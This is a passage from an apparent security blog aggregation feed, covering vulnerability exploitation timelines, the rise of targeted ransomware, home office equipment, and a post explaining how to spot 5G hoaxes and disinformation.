Final thoughts on the path forward. Crawl, walk, run towards ZTA and SASE. Engage your security vendors and have them assist you with ZTA/SASE Workshops to assist with identifying your organizations priorities. Shared experiences with implementing ZTA and SASE are key to successful adoption. When exploring ZTA and SASE, remember you need a comprehensive device to cloud strategy.

The post Zero Trust, SASE-Digital Enablers or Adding Complexity to Cyber Ecosystems appeared first on McAfee Blogs.

Tracking Attackers With Word Web Bugs (Cyber Deception)

Hello and welcome! My name is John Strand, and in this video, we’re going to be talking about Word Web Bug Servers. Now the idea of a Word Web Bug Server is we can create a Word document that any time that document is opened it will actually create a call back and it will […]

The post Tracking Attackers With Word Web Bugs (Cyber Deception) appeared first on Black Hills Information Security.

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities.

Attackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.

Figure 1: Percentage of vulnerabilities exploited at various times in relation to patch release

FireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days – before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.

We believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.

Figure 2: Time between vulnerability exploitation and patch issuance

­­­Time Between Disclosure and Patch Release

The average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.

Exploitation After Patch Release

While the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.

Time to Exploit for Vulnerabilities First Exploited after a Patch


Two vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602.


12 percent of vulnerabilities were exploited within the first week following the patch release.

One Month

15 percent of vulnerabilities were exploited after one week but within one month of patch release.


In multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior.

Table 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure

Case Studies

We continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.

Figure 3: Timeline of activity for CVE-2018-15982

CVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups—Russia's APT28 and North Korea's APT37—as well as TEMP.MetaStrike and other financially motivated attackers.

Figure 4: Timeline of activity for CVE-2018-20250

CVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.

Figure 5: Timeline of Activity for CVE-2018-4878

CVE-2018-4878: A use after free vulnerability exists within the DRMManager’s “initialize” call in Adobe Flash Player and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea’s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia’s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea’s TEMP.Hermit also using within approximately a month of disclosure.

Availability of PoC or Exploit Code

The availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).

Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events



FireEye Risk Rating

1 day




1 day




1 day

Cisco Adaptive Security Appliance



2 days

Apache Struts



2 days

Cisco Adaptive Security Appliance



2 days

Oracle WebLogic Server



2 days

Microsoft Windows Server



2 days




2 days

Atlassian Confluence



Table 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018–Q3 2019

Trends by Targeted Products

FireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.

The majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.

Figure 6: Exploited vulnerabilities by vendor, Q1 2018–Q3 2019

Outlook and Implications

The speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.

We recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attacks panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

Zero-Day Malware

Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

Immagine che contiene dispositivo

Descrizione generata automaticamente

A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

Immagine che contiene dispositivo

Descrizione generata automaticamente

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Working From Home: Building Your Own Setup

This is the fifth week my company (Yoroi) and I are working from home (covid-19). While every company process is running smooth and fast, personal quarantine is getting quite long and heavy especially if you are accustom to travel a lot for working purposes. Under these circumstances home office setup becomes very important as you should be comfortable in delivering as much as you did while sitting in your perfectly fitting office. Moreover during the past few weeks I received many emails and private messages from people like me asking about personal suggestions on home setup. So I decided to write up a little blog post on my personal suggestions about home setup for remote workers.

First: What you do.

My personal home desk changed a lot during the years. On one hand new technology became available but on the other hand (and mostly important) my role and interests changed a lot over time. I started with a super-nerd home setup while I was in college, including soldering irons, desoldering air heater, Arduino boards all over the shelves, Raspberry with many cover flavors, three monitors one of them vertical oriented (for reading documentation), black screen and mechanical keyboards. This environment was fitting my needs in that specific time, but it would not fit my current needs. The first thing that you should do in refactoring your own home desk is to understand what you do. Not what you would like to do, but rather what you do. Before starting surfing on gadget websites, just focus on what you are doing on daily basis. A developer and a Malware analysts share few needs but their environments wont be closed each other. If you are a CXX your environment will look definitely different respect to your IT-Manager !

Second: Less is more.

I know many of you wont agree with this paragraph but in my personal point of view: “less is more” (cit. Mies). As many objects populate your desk as higher is the probability to get distracted from them. I tended to have books on my desks, and every time I watched them I took my mind to that story or to what the book gave me in term of knowledge and.. this was really distracting me. 6 things are my minimal and best setup. A Laptop, a Mouse, a Mechy keyboard, headphones, a big monitor and my phone.

Home SetUP


Talking about monitor I would suggest a single big one. I used to have multiple monitors on my desk and it is amazing to see how many parallel tasks you would keep on them, but many parallel tasks does not necessary mean higher productivity. In my experience I noticed that it’s best to focus on 3 or 4 parallel tasks not more. So a big screen managed by a great window managed (see software section) would help you in not exaggerate on multiple tasks. However if you are a developer an additional vertical screen would definitely help you in consulting StackOverflow, GitHub and Documentations. In many other cases, I personally wont suggest more than two displays. My favorite size is 27″ and I do prefer “border less” monitor with adjustable “neck” in order to move it depending on chair position. Actually one of my favorite is SAMSUNG SR75 4K UHD Space Monitor, it is Ultra HD, great looking and very minimal in space, so you would have much more space for your arms.


Mechanical keyboard is a little pleasure of life. If you are a writer it is definitely a “mush have” while if you are a developer or a malware analyst it’s mostly a fashion. Contrary if you are a penetration tester or a adversarial simulator you would probably appreciate more foldable keyboards or if you are in IT guy you would probably love small and tiny keyboards light and easy to carry between racks on “work in progress” data-centers. Like in monitor ecosystem keyboard is a humongous world where there is not a “best in class” ever, there is what “you like most”. In my case I do love Varmilo keyboards since they allow many quite interesting customizations. Ergonomic plays a fundamental role in keyword choice, but even the most ergonomic keyboards could harm you if you have not a good body posture, so before getting into a very fancy ergonomic keyboard (like the most famous one HERE) try to correct your body posture.


Mouse is one of the most used artifact that you will be touching since you sit on your comfortable chair, so you need to put the right attention on what you choose. While Kensington trackball mouse (here) is definitely my personal suggestion, I do not use it. Since I used to travel a lot during my normal working weeks I can’t carry it back and forth from travels. It’s a trackball is not comfortable to be moved at all. So I decided to take a small but yet nice mouse. If you are used to travel a lot like me, you would probably appreciate a Bluetooth mouse with no cables on the bag (remember less is more). The mouse should be small in size and light. I would suggest having a hard (metal) and mechanical wheel with strong inertia in order to give you back a nice scrolling feeling. One of my favorite is definitely the Logitech MX everywhere 2.


This would be the most important choice, indeed it could be quite easy to change monitor or a mouse, but chaining your PC it would be much more challenging (and expensive). Depending on what you are doing on your daily basis you would have many many choices. So let’s start from the mobility. In my case I move a lot between my offices and where I go I used to have external monitors, so I prefer small laptops. My principal tasks are between malware analysis (most for fun) and management (most for work), so I need many virtual machines (most for fun) and many chrome tabs (most for work). High performances in terms of SSD, CPU and RAM are required (virtualization and Malware analysis tool sets) . If you are a podcaster or a youtuber your would need an high performance graphic processor (especially if you post-process video) , if you are a writer you would probably love to write “around the globe” (not in a small cold office) so you would love a light laptop or if you are a developer or content designer you would probably love a MAC 😀 (just kidding you). My favorite so far is the RazerBlade Stealth 13″ which has incredible performances. Touchscreen monitor and retina display, beyond i7, 16GB ram and 500GB SSD. Generally speaking if you are looking for a PC and not for a MAC I would definitely suggest to take a look to one of the following tiny little but powerful laptops such as: Dell XPS 13, HP Spectre and ASUS ZenBook.


If you are a music lover, well you’d better jump this section. I don’t use headphones for high quality music listening but rather for conferences and calls. However from time to time I love focusing by listening my favorite playlist so I had to figure-out what, in my personal point of view, could be a good arrangement. My best compromise was Jabra Move. If you don’t need music (or if you have a separate headphones for listening to music) having two “covered” ears (in term of stereo) could be quite annoying since it’s not so natural talking without having the right feel of your natural voice (with stereo headphone your voice is quite muffled). On the other hand if you want to listen to the music, definitely you cannot do with a mono headphone. Jabra Move looks like having a nice sound quality and nice integrated microphone, so that you could easily switch between conferences and music without changing hardware.


First of all let me explain why I am crazy about window managers. When you get into the productivity world, having a well-configured system with personal shortcuts is not only a way to speedup the boring tasks (open windows, resize windows, create multi-desktop environments, open up the usual web pages for reading, download stuff and place it on the right folder, saving bookmarks, etc etc) it is actually a way to organize your entire day. As many patterns are available for eMail management (I do prefer the zero-inbox pattern, even if I don’t truly succeed in using it) many are available for virtual desktop management. While I was used to manage virtual desktop by functionality (and this works pretty well on MAC OS systems) on a my Linux box I prefer keeping virtual desktops by projects. So yes, I do have many duplicated applications running but specialized on a specific topic. Questionable, I know… but in this way I feel much more confident since I prefer to classify my work into projects rather than on functionalities over multiple virtual environments. Anyway, a great window management would definitely help you out. I’ve always been fascinated in using i3 tiling windows manger but I was always skeptical in the startup phase: on one hand the time to become fluent in i3 and on the other hand the installation procedure and configuration time was kind killing me. But recently I met regolith which change my way to thing window managers. Today I definitely would suggest you to try it at least for one week.

While a lot of ToDo-list software are available out there, I do prefer the simple Todo.txt. It is damn simple, you can access it from multiple devices, it has a command line, it could manage priorities and… it has a command line !! (did I already mentioned ). If you are a more “web oriented” guy, I would suggest you Trello-CLI, but really not more than that.

One of my favorite editor is VIM. But I am not an “old school guy”, I just love the many many plugin available for it and how you can transform it !

VIM Configuration

Once you’ve learned to dominate VIM you don’t need any editor ever, VIM is everywhere and you might customize it in a very quick and fast way. If you like how my VIM looks like HERE my configuration file, feel free to grab and use it if you wish.


I don’t think there would be a definitive setup. It will change over time depending on your needs. You might need electronic boards and soldering irons or a simple laptop at all. It really depends on what you are doing and what are the deliverables you are working on. In this “unusual” (at least for my corner) post I wanted to answer to many questions on the “perfect home setup” that came to me in the past three weeks. Actually I have my “perfect” setup which I’ve shared with you, but I am sure it will change over and over again even if it has changed a lot in the past few years. The only real suggestion that I’d like to appoint is: “Less is More”. Few things you hold on your desk few distraction-points you would have and faster would be your deliverable.

Have fun and #StayAtHome

Weekly Update 186

Weekly Update 186

Somehow this week's update ended up being 55 minutes, largely because of playing with a bunch of the new network gear and unboxing a pretty snazzy looking rack from 4Cabling. I get through with that then sit by the pool for the rest of this week's update. (And yes, I shaved!)

Incidentally, there's some audio clipping occurring after I sit by the pool. I've tweaked the levels a bit at that point to try and compensate, still not quite sure what happened but hopefully it's not too bad.

Weekly Update 186
Weekly Update 186
Weekly Update 186
Weekly Update 186


  1. We built a Nerf Gun wall! (this was just super good fun, it's now all hooked up to Alexa too)
  2. Pwned Passwords is getting bigger and bigger (more than half a billion queries in a month now)
  3. I hate spam and I hate being asked to link to spammy articles (but I love the outcome of this blog post!)
  4. The 5G health concern situation is an exercise in understanding hoaxes and disinformation campaigns (plus, some of it's just absolutely batshit crazy)
  5. Sponsored by Duo: Going beyond the perimeter: what a 'zero-trust' approach to security means and how to get started. Download the guide by Duo Security.

Let’s Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

Hey, did you hear that Facebook are going to start using your personal photos in whatever way they see fit? For real, it's going to start tomorrow unless you act quickly! All you have to do is copy and paste this message onto your own Facebook page and wammo - they're not allowed to touch them! Ready? Here goes: "With this statement, I give notice to Facebook it is strictly forbidden to disclose, copy, distribute, or take any other action against me based on this profile and/or its contents..."

This sounds ridiculous. It is ridiculous yet somehow, otherwise smart people in my own social networks (and probably yours) lapped it up. Copying and pasting this message achieved absolutely nothing beyond shining a spotlight on those who were prone to falling for hoaxes and disinformation campaigns. I've been following and writing about these for long enough that they're dead obvious to spot these days, for example:

And so it is with posts about the dangers of 5G. I've seen a massive uptick of people sharing information about the emerging cellular standard over the last week or so, enough that it prompted me to ask what's going on via Twitter:

By all means, read through the responses if you want to get a sense of how people responded, but let's avoid the discussion of "does 5G present a danger to our health" and instead talk about how to identify false or misleading information spread by social media. If we spoke about the former, we'd be here all day and others are much more qualified to do it than me. The latter, however, is right up my alley and understanding the hallmarks is valuable well beyond just the current 5G discussion.

So, let's not talk about whether 5G is safe or not, let's instead talk about why opponents of the technology display every single spammy, scammy, hoaxy behaviour imaginable and then you can consider how much you should trust them. I'll break this down into logical headings everyone can easily follow and call out key insights in bold.

It Takes Minutes to Establish (Lack of) Credibility

Let's take a perfect example of disinformation and how easy it is to establish the credibility of what's being shared. I had this pop up a couple of weeks ago:

Sounds ridiculous, but also sounds like the sort of thing non-techie people might fall for. I don't personally know the lady who posted it; she's the mum of a kid in my son's class and AFAIK, not a malware analyst (or anything close) and is unlikely to have an informed opinion on the matter. So let's just Google it:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

Well that was easy. I replied to the lady's message with a link to the hoax within about 60 seconds yet still, other parents chimed in and thanked her.

Let's try the same thing with one of the 5G petitions that's been circulating. This one is titled Stop 5G Networks Now! We do not want a weapons system, nor our brains to be fried!:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

The first warning sign on this petition is literally the warning at the top of the page: has received flags from our users that the statements in this petition may be contested. You should consider researching this issue before signing or sharing.

You'll see the same warning on the Ban the 5g network in Australia petition and the Stop the 5G roll out / Turn off 5G Australia petition. I've seen both these petitions shared in recent days and I'm near certain that none of the people sharing them have "researched this issue before signing or sharing".

Edit: The day after posting this, 2 of the 3 petitions linked to above had been removed by for being "against their community guidelines".

This was started by Jenn Oates so let's dig a little deeper and see what sort of credentials she has given she's talking about the health implications of radio waves. Here's her profile:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

That is all. No bio, but there's still useful information here. The profile pic, for one, is easily searched on Google images and returns a constant theme:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

Crop circles, eh? We'll just park this as a data point frequently related to conspiracy theories and move on. Let's try a Google search for Jenn Oates Parkerville, WA, Australia. The first result is another page with a petition update from Jenn. This is the only content of substance on the page:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

Whoa - "evil Devil worshipping money counting Judas Satanist". So here's another insight:

Insight 1: You can tell a lot about the credibility of a claim by observing those attracted to it.

While we're on petition updates, have a scroll down the page and the last one at the time of writing embeds a YouTube video titled 5G PROGRAMMED to KILL ALL LIFE which was posted by a user called wil paranormal:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

No mention of 5G, but clearly a conspiracy theorist. And again, the insight from above - what does it tell you about a topic when you look at those supporting it?

It took several minutes after looking at Jenn's petition to find the information above and also find a complete lack of information on Jenn herself; no scientific papers, no peer-reviewed content or anything else of any kind you'd expect someone mounting scientific arguments to have produced.

You can play the same easy game with every one of the petitions mentioned above. For example, the "Stop the 5G roll out / Turn off 5G Australia" was started by a "Mumma, Photographer, Glamour/Promotional Model" in Bundaberg, a place better known for making rum than producing scientific research:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

The "Ban the 5g network in Australia" petition was started by a vegan Instagram star, so far the only person who actually contributes to the wellness industry but a world away from scientists who study the effects of radio waves on the human body.

All of the people above are, of course, entitled to their own opinions, but the question you need to ask yourself is contained within the next insight:

Insight 2: Understand the difference between people who have formed their own opinion versus those who are qualified enough to influence your opinion.

One last example just to drive the point home:

I enjoyed Zombieland, but not once did I stop and think "here's a guy who looks like he'd know a thing or two about voltage-gated calcium channel activation exacerbating viral replication". Yet here he is, broadcasting it to 2M Instagram followers. Fortunately, he's since deleted the post.

Understand Your Own Susceptibility to Confirmation Bias

Let's start by understanding the term confirmation bias:

Confirmation bias is the tendency to search for, interpret, favour, and recall information in a way that confirms or strengthens one's prior personal beliefs or hypotheses. It is a type of cognitive bias. People display this bias when they gather or remember information selectively, or when they interpret it in a biased way. The effect is stronger for desired outcomes, for emotionally charged issues, and for deeply-entrenched beliefs.

As it relates to the 5G topic, what I'm consistently seeing is people who want to believe that governments or big tech are suppressing the little guy and willingly believe that resources confirming this view are trustworthy. The problem with confirmation bias is that if you search hard enough, you'll always find material that supports your point of view.

There's a sensational documentary about flat earthers (ok, sensationally entertaining!) I watched on Netflix recently called Behind the Curve. If you've not seen it already, take a moment to watch the trailer:

Note the quote at about the one-minute mark:

I want to believe "this", this doesn't mesh with reality so don't change my view, change reality!

It's the antithesis to scientific research; instead of setting out to determine the conclusion in an evidence-based fashion, people set out with the conclusion they want to believe already cemented in their minds then find the evidence they need in order to support that conclusion.

Insight 3: Consider whether you believe a claim because the evidence supports it, or simply because you want to believe it.

We are all susceptible to confirmation bias, and that includes me. There are things I dearly want to believe and when I see a headline that supports my bias, I'm naturally inclined to latch onto it. The question for you when reading about a topic such as 5G is whether you want to believe that it's dangerous, or whether you want to research it properly and will be satisfied which whatever conclusion the evidence draws you to. That's the key differentiation, and that's what most people I see sharing the conspiracy theories simply aren't doing.

Occam's Razor (Usually) Provides the Answer

A (non-tech) mate asked me about 5G the other day. He'd read news of it being linked to Coronavirus, a conspiracy theory that has gained a surprising amount of momentum in recent weeks. (Sidenote: Wired has a piece titled How the 5G coronavirus conspiracy theory tore through the internet which explains the origins of this.) It doesn't take much searching to find precisely the sort of correlation conspiracies he's talking about:

So we had a discussion about how correlation does not imply causation and how tweets such as the one above show absolutely zero evidence of a cause and effect relationship between 5G and Coronavirus. If that all sounds a bit wordy for you, the following tweet illustrates it beautifully:

So, what's to be done? do we ban Nicholas Cage movies to prevent drowning? No, because that's a patently ridiculous assertion and we can easily reach that conclusion by applying Occam's Razor:

The simplest solution is most likely the right one.

Applied to 5G and Coronavirus, Occam's Razor would conclude that a densely populated city with 11M people will likely spread a highly contagious virus quite quickly. Also, a large city in China (which is rapidly becoming the tech hub of the world) is likely to be an early adaptor of next gen tech. These are both logical, rational and unrelated conclusions.

Insight 4: When faced with alternative theories, consider which one is the simplest and therefore most likely to be true.

Let's apply Occam's Razor to another accusation being made in the 5G debate space: that big tech is censoring discussion on the topic. My mate brought this up in our discussion: "Google shouldn't be censoring free speech by removing YouTube videos, that should be our right". Alrighty then, let's play that thought out - should Google allow extremist videos that incite violence? No, of course not, because that actually has the potential to cause serious harm. How is that related to 5G hoaxes? Convinced of the role 5G plays in the spread of coronavirus, people are literally destroying 5G towers in the UK:

It's just insane, and it's spurned on by batshit crazy videos like this:

One video, removed by the site after the Guardian flagged it, featured a man claiming to be a former executive at a UK mobile network falsely stating that coronavirus tests were actually used to spread the virus, and that the pandemic was created to hide deaths from the mobile technology.

So, applying Occam's Razor, are videos being removed because big tech is trying to silence "the little guy" blowing the whistle on a corrupt industry that is deliberately spreading a deadly virus to cover up 5G radiation deaths, or are they being removed because they incite dickheads to destroy critical infrastructure? There's only one simple answer...

The "Viral" Nature of Hoaxes is a Warning Sign

Let's go back to the Dance of the Pope hoax for a moment, the one that was circulated by a parent in WhatsApp. Literally whilst writing this blog post yesterday, the following came in via Facebook Messenger from a friend of my parents in a totally different social circle:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

The last sentence is the warning sign - "Fwd this msg to as many as you can!" - and you see it over and over again in hoaxes and disinformation campaigns. You'll also see it over and over again as it relates to the 5G debate:

